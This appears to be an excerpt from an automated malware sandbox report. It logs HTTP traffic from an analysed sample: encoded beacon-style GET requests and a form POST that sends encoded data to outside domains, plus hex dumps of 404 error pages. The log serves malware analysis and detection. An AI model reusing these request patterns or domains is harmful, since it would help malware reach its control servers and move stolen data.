                      Source: global trafficHTTP traffic detected: GET /9k5s/?ifzt=LL9hxxOEAXNrd1/9gf6rhKwJTveb5Fl2+AbaSF/ioM6ycsHwCgOlWdWUKzBQGlsNiYd2kWB7LHmLrDvgpCIhDnf37DhA8cnF96i4zyTZqkB+X7XYpxBXm1Q=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sankan-fukushi.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /lnel/?ifzt=Ribo6cOqqFxVl074lXpGE14xRzI3KKS1rVAQT2LhUo1xH+0e39DTDCE0P6QoW4LNcCjE4+6almbk+DseMcJWDalTnHVPsL+WixWnB7fmocU+RCDZF77iizc=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.carsten.studioConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /omhm/?ifzt=xaTrXXt9Kjd4VWfnLz4MLqEmpY3f+jxhDbzO0ePZZ/F2G9w3aeU7HujdvobedEDJNQrJvHKMILqdCxDRZi1zA3XNT5QIvXDZ0i+KO+cUgqjZuYPkfG7cBF4=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.cssa.auctionConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: unknownHTTP traffic detected: POST /572a/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.amayavp.xyzContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 201Origin: http://www.amayavp.xyzReferer: http://www.amayavp.xyz/572a/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36Data Raw: 69 66 7a 74 3d 73 78 58 41 43 63 68 72 38 46 30 69 35 31 4c 69 4e 32 4c 4c 41 47 63 50 6c 54 53 56 72 76 75 6b 41 71 37 6d 4c 78 59 6e 6a 45 55 65 34 48 32 61 32 78 39 57 7a 54 6e 31 59 68 2b 33 65 37 64 38 46 72 7a 53 4b 54 61 4b 58 33 48 53 64 54 65 6a 4b 44 69 61 6c 4e 77 5a 6c 73 47 72 62 36 2f 35 72 47 32 48 59 41 50 30 52 74 74 4c 48 78 30 6c 65 63 50 6d 52 64 62 55 4d 6c 77 4c 67 76 2f 42 56 66 49 48 37 5a 4b 4d 42 48 6b 4d 6f 75 6d 35 43 51 77 49 49 4f 38 4a 57 56 58 74 41 78 48 50 52 67 38 45 68 42 45 47 4f 57 58 6f 34 51 75 2b 56 36 75 62 50 32 65 37 64 36 43 64 67 31 52 52 41 77 3d 3d Data Ascii: ifzt=sxXACchr8F0i51LiN2LLAGcPlTSVrvukAq7mLxYnjEUe4H2a2x9WzTn1Yh+3e7d8FrzSKTaKX3HSdTejKDialNwZlsGrb6/5rG2HYAP0RttLHx0lecPmRdbUMlwLgv/BVfIH7ZKMBHkMoum5CQwIIO8JWVXtAxHPRg8EhBEGOWXo4Qu+V6ubP2e7d6Cdg1RRAw==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:43:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 
22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:43:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 
22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:43:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 
22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:43:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:43:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:43:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:43:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 